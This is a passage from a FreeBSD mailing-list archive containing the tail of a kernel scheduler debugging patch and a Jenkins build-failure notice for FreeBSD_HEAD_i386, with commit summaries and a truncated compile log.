thread *td, struct thread *new td->td_owepreempt = 0; if (!TD_IS_IDLETHREAD(td)) tdq->tdq_switchcnt++; + + if (td == &thread0 && cold) { + printf("thread0 switching out (ts_cpu %d):\n", ts->ts_cpu); + kdb_backtrace(); + MPASS(TD_IS_RUNNING(td)); + } + /* * The lock pointer in an idle thread should never change. Reset it * to CAN_RUN as well. @@ -1920,6 +1927,9 @@ sched_switch(struct thread *td, struct thread *new if (THREAD_CAN_MIGRATE(td) && !THREAD_CAN_SCHED(td, ts->ts_cpu)) ts->ts_cpu = sched_pickcpu(td, 0); #endif + if (td == &thread0 && cold) + printf("thread0 ts_cpu %d, cpuid %d\n", ts->ts_cpu, + cpuid); if (ts->ts_cpu == cpuid) tdq_runq_add(tdq, td, srqflag); else { -- John Baldwin From owner-freebsd-current@freebsd.org Wed Jul 27 22:12:28 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 9C472BA6D8C; Wed, 27 Jul 2016 22:12:28 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id 8F675120B; Wed, 27 Jul 2016 22:12:28 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id D39A312D; Wed, 27 Jul 2016 22:12:28 +0000 (UTC) Date: Wed, 27 Jul 2016 22:12:25 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: rrs@FreeBSD.org, ivadasz@FreeBSD.org, bdrewery@FreeBSD.org, jhb@FreeBSD.org, stevek@FreeBSD.org, jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org, freebsd-i386@FreeBSD.org Message-ID: <490642186.22.1469657548877.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: FreeBSD_HEAD_i386 - Build #3701 - Failure MIME-Version: 1.0 X-Jenkins-Job: FreeBSD_HEAD_i386 X-Jenkins-Result: FAILURE Precedence: bulk Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.22 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 27 Jul 2016 22:12:28 -0000 FreeBSD_HEAD_i386 - Build #3701 - Failure: Build information: https://jenkins.FreeBSD.org/job/FreeBSD_HEAD_i386/3701/ Full change log: https://jenkins.FreeBSD.org/job/FreeBSD_HEAD_i386/3701/cha= nges Full build log: https://jenkins.FreeBSD.org/job/FreeBSD_HEAD_i386/3701/cons= ole Change summaries: 303418 by ivadasz: [iwm] When stopping TX DMA, wait for all channels at once. * Makes the TX DMA stopping more similar to Linux code, and potentially a bit faster. Also, output an error message when TX DMA idling fails. Taken-From: Linux iwlwifi Tested: * AC3165, STA mode Approved by:=09adrian (mentor) Obtained from:=09DragonFlyBSD git 2ee486ddff973ac552ff787c17e8d83e8ae0f24c Differential Revision:=09https://reviews.freebsd.org/D7325 303417 by bdrewery: opt_bdg.h was removed in r150636. MFC after:=093 days Sponsored by:=09EMC / Isilon Storage Division 303416 by ivadasz: [iwm] Set different pm_timeout for action frames. When building a Tx Command for management frames, we are lacking a check for action frames, for which we should set a different pm_timeout. This cause the fw to stay awake for 100TU after each such frame is transmitted, resulting an excessive power consumption. Taken-From: Linux iwlwifi (git b084a35663c3f1f7) Approved by:=09adrian (mentor) Obtained from:=09Linux git b084a35663c3f1f7de1c45c4ae3006864c940fe7 Obtained from:=09DragonFlyBSD git ba00f0e3ae873d6f0d5743e22c3ebc49c44dfdac Differential Revision:=09https://reviews.freebsd.org/D7324 303415 by bdrewery: opt_apic.h is only used on i386. MFC after:=093 days Sponsored by:=09EMC / Isilon Storage Division 303414 by bdrewery: opt_random.h was removed in r287558 for opt_global.h MFC after:=093 days Sponsored by:=09EMC / Isilon Storage Division 303413 by ivadasz: [iwm] Fix inverted logic in iwm_tx(). The PROT_REQUIRE flag in should be set for data frames above a certain length, but we were setting it for !data frames above a certain length, which makes no sense at all. Taken-From: OpenBSD, Linux iwlwifi Approved by:=09adrian (mentor) Obtained from:=09DragonFlyBSD git 8cc03924a36c572c2908e659e624f44636dc2b33 Differential Revision:=09https://reviews.freebsd.org/D7323 303412 by rrs: Remove myself from kern_timeout.c yeah! 303411 by stevek: Prepare for network stack as a module - Move cr_canseeinpcb to sys/netinet/in_prot.c in order to separate the INET and INET6-specific code from the rest of the prot code (It is only used by the network stack, so it makes sense for it to live with the other network stack code.) - Move cr_canseeinpcb prototype from sys/systm.h to netinet/in_systm.h - Rename cr_seeotheruids to cr_canseeotheruids and cr_seeothergids to cr_canseeothergids, make them non-static, and add prototypes (so they can be seen/called by in_prot.c functions.) - Remove sw_csum variable from ip6_forward in ip6_forward.c, as it is an unused variable. Reviewed by:=09gnn, jtl Approved by:=09sjg (mentor) Sponsored by:=09Juniper Networks, Inc. Differential Revision:=09https://reviews.freebsd.org/D2901 303410 by bdrewery: Reconnect pmcstudy, lost in r291021 Reported by:=09pluknet MFC after:=093 days Sponsored by:=09EMC / Isilon Storage Division 303406 by jhb: Adjust tests in fsync job scheduling loop to reduce indentation. The end of the build log: [...truncated 139023 lines...] =3D=3D=3D> usr.bin/indent (all) --- all_subdir_usr.sbin --- --- all_subdir_usr.sbin/ntp --- --- dir.o --- cc -O2 -pipe -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/include = -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/include -I/us= r/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/unix/include -I/usr= /src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/pthreads/include -I/= usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/sntp/libopts -I/usr/src/u= sr.sbin/ntp/libntp/../../../lib/libc/i386 -I/usr/src/usr.sbin/ntp/libntp/.= ./../../lib/libedit/edit -I/usr/src/usr.sbin/ntp/libntp/../ -I/usr/src/us= r.sbin/ntp/libntp/ -DHAVE_BSD_NICE -DHAVE_STDINT_H -DSYS_FREEBSD -DPARSE = -DHAVE_CONFIG_H -DOPENSSL -DUSE_OPENSSL_CRYPTO_RAND -DAUTOKEY -MD -MF.dep= end.dir.o -MTdir.o -std=3Dgnu99 -fstack-protector-strong -Wno-pointer-sign = -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno-tautol= ogical-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unused-func= tion -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-switch= -enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-arguments -c = /usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/unix/dir.c -o dir= .o --- all_subdir_usr.bin --- --- .depend --- echo indent.full: /usr/obj/usr/src/tmp/usr/lib/libc.a >> .depend --- indent.o --- cc -O2 -pipe -g -MD -MF.depend.indent.o -MTindent.o -std=3Dgnu99 -fstac= k-protector-strong -Wsystem-headers -Werror -Wall -Wno-format-y2k -W -Wno-u= nused-parameter -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -W= return-type -Wcast-qual -Wwrite-strings -Wswitch -Wshadow -Wunused-paramete= r -Wcast-align -Wchar-subscripts -Winline -Wnested-externs -Wredundant-decl= s -Wold-style-definition -Wno-pointer-sign -Wthread-safety -Wno-empty-body = -Wno-string-plus-int -Wno-unused-const-variable -Qunused-arguments -c /us= r/src/usr.bin/indent/indent.c -o indent.o --- all_subdir_usr.bin/gprof --- --- aout.o --- cc -O2 -pipe -g -MD -MF.depend.aout.o -MTaout.o -std=3Dgnu99 -fstack-pr= otector-strong -Wsystem-headers -Werror -Wno-pointer-sign -Wno-empty-body -= Wno-string-plus-int -Wno-unused-const-variable -Wno-tautological-compare -W= no-unused-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-co= nversion -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-pr= omoted-parameter -Wno-parentheses -Qunused-arguments -c /usr/src/usr.bin/= gprof/aout.c -o aout.o --- all_subdir_usr.bin/elfcopy --- --- pe.o --- cc -O2 -pipe -I/usr/src/contrib/elftoolchain/libelftc -I/usr/src/contrib= /elftoolchain/libpe -I/usr/src/contrib/elftoolchain/common -DWITH_PE=3D1 -I= . -g -MD -MF.depend.pe.o -MTpe.o -std=3Dgnu99 -fstack-protector-strong -Ws= ystem-headers -Werror -Wall -Wno-format-y2k -W -Wno-unused-parameter -Wstri= ct-prototypes -Wmissing-prototypes -Wpointer-arith -Wreturn-type -Wcast-qua= l -Wwrite-strings -Wswitch -Wshadow -Wunused-parameter -Wcast-align -Wno-po= inter-sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable = -Qunused-arguments -c /usr/src/contrib/elftoolchain/elfcopy/pe.c -o pe.o --- all_subdir_usr.sbin --- --- errno2result.o --- cc -O2 -pipe -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/include = -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/include -I/us= r/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/unix/include -I/usr= /src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/pthreads/include -I/= usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/sntp/libopts -I/usr/src/u= sr.sbin/ntp/libntp/../../../lib/libc/i386 -I/usr/src/usr.sbin/ntp/libntp/.= ./../../lib/libedit/edit -I/usr/src/usr.sbin/ntp/libntp/../ -I/usr/src/us= r.sbin/ntp/libntp/ -DHAVE_BSD_NICE -DHAVE_STDINT_H -DSYS_FREEBSD -DPARSE = -DHAVE_CONFIG_H -DOPENSSL -DUSE_OPENSSL_CRYPTO_RAND -DAUTOKEY -MD -MF.dep= end.errno2result.o -MTerrno2result.o -std=3Dgnu99 -fstack-protector-strong = -Wno-pointer-sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-va= riable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses-equalit= y -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-= switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunu= sed-arguments -c /usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc= /unix/errno2result.c -o errno2result.o --- file.o --- cc -O2 -pipe -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/include = -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/include -I/us= r/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/unix/include -I/usr= /src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/pthreads/include -I/= usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/sntp/libopts -I/usr/src/u= sr.sbin/ntp/libntp/../../../lib/libc/i386 -I/usr/src/usr.sbin/ntp/libntp/.= ./../../lib/libedit/edit -I/usr/src/usr.sbin/ntp/libntp/../ -I/usr/src/us= r.sbin/ntp/libntp/ -DHAVE_BSD_NICE -DHAVE_STDINT_H -DSYS_FREEBSD -DPARSE = -DHAVE_CONFIG_H -DOPENSSL -DUSE_OPENSSL_CRYPTO_RAND -DAUTOKEY -MD -MF.dep= end.file.o -MTfile.o -std=3Dgnu99 -fstack-protector-strong -Wno-pointer-sig= n -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno-taut= ological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unused-fu= nction -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-swit= ch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-arguments -= c /usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/unix/file.c -o = file.o --- all_subdir_usr.bin --- --- all_subdir_usr.bin/gprof --- --- arcs.o --- cc -O2 -pipe -g -MD -MF.depend.arcs.o -MTarcs.o -std=3Dgnu99 -fstack-pr= otector-strong -Wsystem-headers -Werror -Wno-pointer-sign -Wno-empty-body -= Wno-string-plus-int -Wno-unused-const-variable -Wno-tautological-compare -W= no-unused-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-co= nversion -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-pr= omoted-parameter -Wno-parentheses -Qunused-arguments -c /usr/src/usr.bin/= gprof/arcs.c -o arcs.o --- all_subdir_usr.bin/elfcopy --- --- sections.o --- cc -O2 -pipe -I/usr/src/contrib/elftoolchain/libelftc -I/usr/src/contrib= /elftoolchain/libpe -I/usr/src/contrib/elftoolchain/common -DWITH_PE=3D1 -I= . -g -MD -MF.depend.sections.o -MTsections.o -std=3Dgnu99 -fstack-protecto= r-strong -Wsystem-headers -Werror -Wall -Wno-format-y2k -W -Wno-unused-para= meter -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -Wreturn-typ= e -Wcast-qual -Wwrite-strings -Wswitch -Wshadow -Wunused-parameter -Wcast-a= lign -Wno-pointer-sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-con= st-variable -Qunused-arguments -c /usr/src/contrib/elftoolchain/elfcopy/s= ections.c -o sections.o --- all_subdir_usr.sbin --- --- interfaceiter.o --- cc -O2 -pipe -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/include = -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/include -I/us= r/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/unix/include -I/usr= /src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/pthreads/include -I/= usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/sntp/libopts -I/usr/src/u= sr.sbin/ntp/libntp/../../../lib/libc/i386 -I/usr/src/usr.sbin/ntp/libntp/.= ./../../lib/libedit/edit -I/usr/src/usr.sbin/ntp/libntp/../ -I/usr/src/us= r.sbin/ntp/libntp/ -DHAVE_BSD_NICE -DHAVE_STDINT_H -DSYS_FREEBSD -DPARSE = -DHAVE_CONFIG_H -DOPENSSL -DUSE_OPENSSL_CRYPTO_RAND -DAUTOKEY -MD -MF.dep= end.interfaceiter.o -MTinterfaceiter.o -std=3Dgnu99 -fstack-protector-stron= g -Wno-pointer-sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-= variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses-equal= ity -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typedef -Wn= o-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qu= nused-arguments -c /usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/i= sc/unix/interfaceiter.c -o interfaceiter.o --- all_subdir_usr.bin --- --- all_subdir_usr.bin/indent --- --- io.o --- cc -O2 -pipe -g -MD -MF.depend.io.o -MTio.o -std=3Dgnu99 -fstack-protec= tor-strong -Wsystem-headers -Werror -Wall -Wno-format-y2k -W -Wno-unused-pa= rameter -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -Wreturn-t= ype -Wcast-qual -Wwrite-strings -Wswitch -Wshadow -Wunused-parameter -Wcast= -align -Wchar-subscripts -Winline -Wnested-externs -Wredundant-decls -Wold-= style-definition -Wno-pointer-sign -Wthread-safety -Wno-empty-body -Wno-str= ing-plus-int -Wno-unused-const-variable -Qunused-arguments -c /usr/src/us= r.bin/indent/io.c -o io.o --- all_subdir_usr.bin/gprof --- --- dfn.o --- cc -O2 -pipe -g -MD -MF.depend.dfn.o -MTdfn.o -std=3Dgnu99 -fstack-prot= ector-strong -Wsystem-headers -Werror -Wno-pointer-sign -Wno-empty-body -Wn= o-string-plus-int -Wno-unused-const-variable -Wno-tautological-compare -Wno= -unused-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-conv= ersion -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-prom= oted-parameter -Wno-parentheses -Qunused-arguments -c /usr/src/usr.bin/gp= rof/dfn.c -o dfn.o --- all_subdir_usr.sbin --- --- net.o --- cc -O2 -pipe -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/include = -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/include -I/us= r/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/unix/include -I/usr= /src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/pthreads/include -I/= usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/sntp/libopts -I/usr/src/u= sr.sbin/ntp/libntp/../../../lib/libc/i386 -I/usr/src/usr.sbin/ntp/libntp/.= ./../../lib/libedit/edit -I/usr/src/usr.sbin/ntp/libntp/../ -I/usr/src/us= r.sbin/ntp/libntp/ -DHAVE_BSD_NICE -DHAVE_STDINT_H -DSYS_FREEBSD -DPARSE = -DHAVE_CONFIG_H -DOPENSSL -DUSE_OPENSSL_CRYPTO_RAND -DAUTOKEY -MD -MF.dep= end.net.o -MTnet.o -std=3Dgnu99 -fstack-protector-strong -Wno-pointer-sign = -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno-tautol= ogical-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unused-func= tion -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-switch= -enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-arguments -c = /usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/unix/net.c -o net= .o --- all_subdir_usr.bin --- --- elf.o --- cc -O2 -pipe -g -MD -MF.depend.elf.o -MTelf.o -std=3Dgnu99 -fstack-prot= ector-strong -Wsystem-headers -Werror -Wno-pointer-sign -Wno-empty-body -Wn= o-string-plus-int -Wno-unused-const-variable -Wno-tautological-compare -Wno= -unused-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-conv= ersion -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-prom= oted-parameter -Wno-parentheses -Qunused-arguments -c /usr/src/usr.bin/gp= rof/elf.c -o elf.o --- all_subdir_usr.sbin --- --- stdio.o --- cc -O2 -pipe -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/include = -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/include -I/us= r/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/unix/include -I/usr= /src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/pthreads/include -I/= usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/sntp/libopts -I/usr/src/u= sr.sbin/ntp/libntp/../../../lib/libc/i386 -I/usr/src/usr.sbin/ntp/libntp/.= ./../../lib/libedit/edit -I/usr/src/usr.sbin/ntp/libntp/../ -I/usr/src/us= r.sbin/ntp/libntp/ -DHAVE_BSD_NICE -DHAVE_STDINT_H -DSYS_FREEBSD -DPARSE = -DHAVE_CONFIG_H -DOPENSSL -DUSE_OPENSSL_CRYPTO_RAND -DAUTOKEY -MD -MF.dep= end.stdio.o -MTstdio.o -std=3Dgnu99 -fstack-protector-strong -Wno-pointer-s= ign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno-ta= utological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unused-= function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-sw= itch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-arguments = -c /usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/unix/stdio.c = -o stdio.o --- all_subdir_usr.bin --- --- lookup.o --- cc -O2 -pipe -g -MD -MF.depend.lookup.o -MTlookup.o -std=3Dgnu99 -fstac= k-protector-strong -Wsystem-headers -Werror -Wno-pointer-sign -Wno-empty-bo= dy -Wno-string-plus-int -Wno-unused-const-variable -Wno-tautological-compar= e -Wno-unused-value -Wno-parentheses-equality -Wno-unused-function -Wno-enu= m-conversion -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-kn= r-promoted-parameter -Wno-parentheses -Qunused-arguments -c /usr/src/usr.= bin/gprof/lookup.c -o lookup.o --- all_subdir_usr.sbin --- --- stdtime.o --- cc -O2 -pipe -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/include = -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/include -I/us= r/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/unix/include -I/usr= /src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/pthreads/include -I/= usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/sntp/libopts -I/usr/src/u= sr.sbin/ntp/libntp/../../../lib/libc/i386 -I/usr/src/usr.sbin/ntp/libntp/.= ./../../lib/libedit/edit -I/usr/src/usr.sbin/ntp/libntp/../ -I/usr/src/us= r.sbin/ntp/libntp/ -DHAVE_BSD_NICE -DHAVE_STDINT_H -DSYS_FREEBSD -DPARSE = -DHAVE_CONFIG_H -DOPENSSL -DUSE_OPENSSL_CRYPTO_RAND -DAUTOKEY -MD -MF.dep= end.stdtime.o -MTstdtime.o -std=3Dgnu99 -fstack-protector-strong -Wno-point= er-sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wn= o-tautological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unu= sed-function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wn= o-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-argume= nts -c /usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/unix/stdt= ime.c -o stdtime.o --- all_subdir_usr.bin --- --- hertz.o --- cc -O2 -pipe -g -MD -MF.depend.hertz.o -MThertz.o -std=3Dgnu99 -fstack-= protector-strong -Wsystem-headers -Werror -Wno-pointer-sign -Wno-empty-body= -Wno-string-plus-int -Wno-unused-const-variable -Wno-tautological-compare = -Wno-unused-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-= conversion -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-= promoted-parameter -Wno-parentheses -Qunused-arguments -c /usr/src/usr.bi= n/gprof/hertz.c -o hertz.o --- all_subdir_usr.sbin --- --- strerror.o --- cc -O2 -pipe -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/include = -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/include -I/us= r/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/unix/include -I/usr= /src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/pthreads/include -I/= usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/sntp/libopts -I/usr/src/u= sr.sbin/ntp/libntp/../../../lib/libc/i386 -I/usr/src/usr.sbin/ntp/libntp/.= ./../../lib/libedit/edit -I/usr/src/usr.sbin/ntp/libntp/../ -I/usr/src/us= r.sbin/ntp/libntp/ -DHAVE_BSD_NICE -DHAVE_STDINT_H -DSYS_FREEBSD -DPARSE = -DHAVE_CONFIG_H -DOPENSSL -DUSE_OPENSSL_CRYPTO_RAND -DAUTOKEY -MD -MF.dep= end.strerror.o -MTstrerror.o -std=3Dgnu99 -fstack-protector-strong -Wno-poi= nter-sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -= Wno-tautological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-u= nused-function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -= Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-argu= ments -c /usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/unix/st= rerror.c -o strerror.o --- all_subdir_usr.bin --- --- printgprof.o --- cc -O2 -pipe -g -MD -MF.depend.printgprof.o -MTprintgprof.o -std=3Dgnu9= 9 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-sign -Wno-= empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno-tautologica= l-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unused-function = -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum= -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-arguments -c /usr/= src/usr.bin/gprof/printgprof.c -o printgprof.o --- all_subdir_usr.bin/indent --- --- lexi.o --- cc -O2 -pipe -g -MD -MF.depend.lexi.o -MTlexi.o -std=3Dgnu99 -fstack-pr= otector-strong -Wsystem-headers -Werror -Wall -Wno-format-y2k -W -Wno-unuse= d-parameter -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -Wretu= rn-type -Wcast-qual -Wwrite-strings -Wswitch -Wshadow -Wunused-parameter -W= cast-align -Wchar-subscripts -Winline -Wnested-externs -Wredundant-decls -W= old-style-definition -Wno-pointer-sign -Wthread-safety -Wno-empty-body -Wno= -string-plus-int -Wno-unused-const-variable -Qunused-arguments -c /usr/sr= c/usr.bin/indent/lexi.c -o lexi.o --- all_subdir_usr.sbin --- --- time.o --- cc -O2 -pipe -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/include = -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/include -I/us= r/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/unix/include -I/usr= /src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/pthreads/include -I/= usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/sntp/libopts -I/usr/src/u= sr.sbin/ntp/libntp/../../../lib/libc/i386 -I/usr/src/usr.sbin/ntp/libntp/.= ./../../lib/libedit/edit -I/usr/src/usr.sbin/ntp/libntp/../ -I/usr/src/us= r.sbin/ntp/libntp/ -DHAVE_BSD_NICE -DHAVE_STDINT_H -DSYS_FREEBSD -DPARSE = -DHAVE_CONFIG_H -DOPENSSL -DUSE_OPENSSL_CRYPTO_RAND -DAUTOKEY -MD -MF.dep= end.time.o -MTtime.o -std=3Dgnu99 -fstack-protector-strong -Wno-pointer-sig= n -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno-taut= ological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unused-fu= nction -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-swit= ch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-arguments -= c /usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/unix/time.c -o = time.o --- tsmemcmp.o --- cc -O2 -pipe -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/include = -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/include -I/us= r/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/unix/include -I/usr= /src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/pthreads/include -I/= usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/sntp/libopts -I/usr/src/u= sr.sbin/ntp/libntp/../../../lib/libc/i386 -I/usr/src/usr.sbin/ntp/libntp/.= ./../../lib/libedit/edit -I/usr/src/usr.sbin/ntp/libntp/../ -I/usr/src/us= r.sbin/ntp/libntp/ -DHAVE_BSD_NICE -DHAVE_STDINT_H -DSYS_FREEBSD -DPARSE = -DHAVE_CONFIG_H -DOPENSSL -DUSE_OPENSSL_CRYPTO_RAND -DAUTOKEY -MD -MF.dep= end.tsmemcmp.o -MTtsmemcmp.o -std=3Dgnu99 -fstack-protector-strong -Wno-poi= nter-sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -= Wno-tautological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-u= nused-function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -= Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-argu= ments -c /usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/lib/isc/tsmemcm= p.c -o tsmemcmp.o --- all_subdir_usr.bin --- --- parse.o --- cc -O2 -pipe -g -MD -MF.depend.parse.o -MTparse.o -std=3Dgnu99 -fstack-= protector-strong -Wsystem-headers -Werror -Wall -Wno-format-y2k -W -Wno-unu= sed-parameter -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -Wre= turn-type -Wcast-qual -Wwrite-strings -Wswitch -Wshadow -Wunused-parameter = -Wcast-align -Wchar-subscripts -Winline -Wnested-externs -Wredundant-decls = -Wold-style-definition -Wno-pointer-sign -Wthread-safety -Wno-empty-body -W= no-string-plus-int -Wno-unused-const-variable -Qunused-arguments -c /usr/= src/usr.bin/indent/parse.c -o parse.o --- all_subdir_usr.bin/elfcopy --- --- segments.o --- cc -O2 -pipe -I/usr/src/contrib/elftoolchain/libelftc -I/usr/src/contrib= /elftoolchain/libpe -I/usr/src/contrib/elftoolchain/common -DWITH_PE=3D1 -I= . -g -MD -MF.depend.segments.o -MTsegments.o -std=3Dgnu99 -fstack-protecto= r-strong -Wsystem-headers -Werror -Wall -Wno-format-y2k -W -Wno-unused-para= meter -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -Wreturn-typ= e -Wcast-qual -Wwrite-strings -Wswitch -Wshadow -Wunused-parameter -Wcast-a= lign -Wno-pointer-sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-con= st-variable -Qunused-arguments -c /usr/src/contrib/elftoolchain/elfcopy/s= egments.c -o segments.o --- all_subdir_usr.sbin --- --- version.o --- cc -O2 -pipe -I/usr/src/usr.sbin/ntp/libntp/../../../contrib/ntp/include = 